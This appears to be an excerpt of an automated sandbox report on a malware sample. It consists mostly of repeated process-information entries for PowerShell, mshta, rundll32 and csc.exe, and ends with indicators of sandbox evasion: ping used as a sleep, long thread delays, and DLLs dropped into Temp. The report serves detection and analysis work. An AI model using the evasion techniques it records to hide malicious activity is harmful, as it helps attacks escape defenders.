Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Uses ping.exe to sleep

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3376	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332	Thread sleep count: 3419 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332	Thread sleep count: 5432 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6320	Thread sleep time: -16602069666338586s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ebytp2em.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hiiw3gsl.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uio4qdnj.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hjljqxud.dll	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3911	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5235	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3419
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5432

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

